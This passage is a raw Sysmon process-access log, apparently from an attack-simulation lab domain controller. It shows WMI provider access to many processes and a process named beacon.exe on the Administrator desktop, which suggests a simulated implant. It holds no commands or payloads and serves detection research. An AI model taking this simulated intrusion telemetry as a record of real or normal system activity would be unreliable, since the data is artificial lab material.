16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.675{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852\PSHost.132591776434953556.15852.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.675{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCR